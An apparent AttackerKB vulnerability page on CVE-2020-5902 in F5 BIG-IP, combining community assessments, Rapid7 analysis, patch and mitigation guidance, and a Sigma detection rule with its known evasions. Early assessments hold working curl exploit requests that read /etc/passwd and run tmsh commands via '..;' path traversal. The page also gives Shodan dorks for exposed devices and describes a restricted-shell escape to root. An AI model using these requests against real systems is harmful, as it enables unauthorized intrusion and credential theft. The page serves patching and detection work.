Very High
CVE-2020-5902 — TMUI RCE vulnerability
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2020-5902 — TMUI RCE vulnerability
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Overview
This one is Critical to patch quickly with a CVSS Score of 10.
If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.
Patch & Mitigation
Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.
Refer to the F5 Article for details. – https://support.f5.com/csp/article/K52145254
Cloud Services
If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.
- At the time of Writing AWS MarketPlace version is
15.1.0.2-0.0.9
In the wild POC
Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.
Core Vulnerability.
The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.
Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:
- File read
- File Write
- tmsh access
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' {"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}%
This doesn’t only affect the login.jsp path it can be used from anywhere.
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' {"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure 'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch>
Versions Effected
- BIG-IP 15.x: 15.1.0/15.0.0
- BIG-IP 14.x: 14.1.0 ~ 14.1.2
- BIG-IP 13.x: 13.1.0 ~ 13.1.3
- BIG-IP 12.x: 12.1.0 ~ 12.1.5
- BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
https://beta.shodan.io/search?query=vuln%3Acve-2020-5902
https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportNice, saw your gist with check logic, too—Metasploit should have an exploit out shortly. Sounds from the researcher working on it that his check method is similar. Thanks for the assessment, super appreciated!
Ratings
-
Attacker ValueVery High
Technical Analysis
There have been several reports of exploitation in the wild as of July 4. The one I’ve seen cited the most is here.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Noticed an initial script from @RootUp that looks handy for scanning environments: https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
This script may be better with fewer false-positives according to here :
https://github.com/rwincey/CVE-2020-5902-NSE/blob/master/http-f5-tmui-path-traversal.nse
Note that these scripts actively exploit the vuln, which may not be legal to run without permission, noted by @tsellers-r7 https://twitter.com/TomSellers/status/1280485081908305920
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
Technical Analysis
Update July 2021: https://us-cert.cisa.gov/ncas/alerts/aa21-209a notes that this was one of the most commonly exploited vulnerabilities by APT groups in 2020.
Just wanted to add in the fact that is now supposedly being exploited by Chinese State Sponsored actors according to the NSA announcement at https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
In the most recent vulnerable versions of BIG-IP, accessing TMSH through the TMUI path traversal leads to “RCE” insofar as you can execute management commands in a restricted TMSH environment.
That said, there are a few different ways you can break out of the restricted shell. One method utilizes TMSH’s command alias functionality to map a blocked command to an allowed command. This results in Unix shell access as root.
In either case, privileged access to an F5 BIG-IP device is critical, as these often sit at network borders and even provide SSL termination!
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueMedium
-
ExploitabilityHigh
Technical Analysis
a
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- f5
Products
- big-ip access policy manager,
- big-ip advanced firewall manager,
- big-ip advanced web application firewall,
- big-ip analytics,
- big-ip application acceleration manager,
- big-ip application security manager,
- big-ip ddos hybrid defender,
- big-ip domain name system,
- big-ip fraud protection service,
- big-ip global traffic manager,
- big-ip link controller,
- big-ip local traffic manager,
- big-ip policy enforcement manager,
- ssl orchestrator
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report- Government or Industry Alert (https://us-cert.cisa.gov/ncas/alerts/aa21-209a)
- Threat Feed (https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm)
- News Article or Blog (https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers)
- Other: 2020 Commonly Exploited Vulnerabilities Report (https://www.ic3.gov/Media/News/2021/210728.pdf)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Miscellaneous
Additional Info
Technical Analysis
Description: On July 3, F5 Networks announced that its BIG-IP Traffic Management User Interface (TMUI) has a remote code execution vulnerability (CVE-2020-5902) in undisclosed pages. Successful exploitation allows unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. See F5’s advisory, which was published June 30, for full details.
CVE-2020-5902 carries a CVSSv3 base score of 10.0 and is known to be actively exploited in the wild as of July 3, 2020. Security researcher Kevin Beaumont also noted on Sunday, July 5 that BIG-IP boxes are being targeted with automated credential scraping, and that organizations whose BIG-IP instances were yet to be upgraded should rotate credentials and examine log data.
Affected products include: BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM)
Known vulnerable versions:
- 15.1.0
- 15.0.0
- 14.1.0 – 14.1.2
- 13.1.0 – 13.1.3
- 12.1.0 – 12.1.5
- 11.6.1 – 11.6.5
F5’s advisory notes that “the BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.”
Rapid7 analysis: BIG-IP is common in enterprise and high-value environments and makes an extremely attractive attack target even for vulnerabilities with higher barriers to exploitation. CVE-2020-5902 presents no such hurdle for attackers; the vulnerability is easily exploitable and straightforward to weaponize. As of July 5, Rapid7’s vulnerability research and exploit development team has tested multiple attack vectors and was able to achieve unauthenticated remote root code execution with one of them: RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. Metasploit exploit code that obtains a root shell on vulnerable versions of BIG-IP is here.
Over the weekend, the research community published a widely shared Sigma rule to detect exploitation. The rule is under active revision to account for and mitigate a number of different evasions. Further details are below, but in general defenders should be aware of quickly evolving information about mitigation and detection bypasses. Defenders can mitigate the risk of evasions by modifying monitoring processes to alert on unique components (e.g., ..;
, tmui
) and setting more precise matching rules.
Originally, the Sigma rule checked for a base path, /tmui/login
, like so:
detection: selection_base: c-uri|contains: '/tmui/login' selection_traversal: c-uri|contains: - '..;/' - '.jsp/..' condition: selection_base and selection_traversal
This means the path must contain /tmui/login
as a prerequisite, then either ..;/
or .jsp/..
. Rapid7 researchers verified as of July 7, 2020 that it was possible for attackers to circumvent the rule—for instance by modifying the login path to /tmui/./login
, where .
means current directory (/tmui
). In general, path normalization works against detection rules here, i.e., in that the addition of .
is normalized to /tmui/login
. As of July 8, this evasion has since been mitigated by updates to the Sigma rule. However, Metasploit researchers have tested further evasions that, for instance, break selection_traversal
instead of selection_base
. Our guidance for defenders remains the same—alerting on unique components and setting precise matching rules is recommended as an overarching strategy regardless of the particulars of each new evasion.
Guidance:
F5 Networks customers running affected products should upgrade to a non-vulnerable version as quickly as possible. If you are unable to patch, F5 lists a number of mitigation options with detailed instructions in the Security Advisory Recommended Actions
section of their advisory. In general, organizations should avoid exposing management interfaces to the public internet.
Update August 4, 2020: AlienVault and Trend Micro research has said this week that a Mirai botnet exploit has been weaponized to attack IoT devices via CVE-2020-5902. Per Trend Micro’s report, “a Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI) can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.”
Update July 13, 2020: Researchers have strongly emphasized that patching is far preferred to applying mitigations. The mitigation bypass shared last week has been detected in the wild since at least July 7. Further information from F5 Networks is below, but organizations that were unable to patch and instead applied the mitigation should assess their systems for compromise and patch as soon as possible.
Update July 8, 2020: The F5 Networks communication below advises BIG-IP customers who were unable to patch that their previously suggested mitigation is able to be circumvented.
“The Security Advisory for this CVE contained a suggested mitigation, for those unable to upgrade immediately, which was believed to prevent unauthenticated attackers from exploiting the vulnerability. Today F5 received new information, which indicated there was a method for attackers to circumvent the mitigation and compromise an unpatched system.
A new mitigation has been developed, and an updated Security Advisory has been published: K52145254: TMUI RCE vulnerability CVE-2020-5902. F5 recommends applying this new mitigation to all systems which have not yet been upgraded to a patched release, including those systems which were previously mitigated.”
As community reports have indicated both active exploitation of CVE-2020-5902 and automated credential scraping, BIG-IP customers should also strongly consider changing credentials and examining their logs for unusual activity. Organizations should assess whether their individual risk models warrant further incident response or other compromise investigation.
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: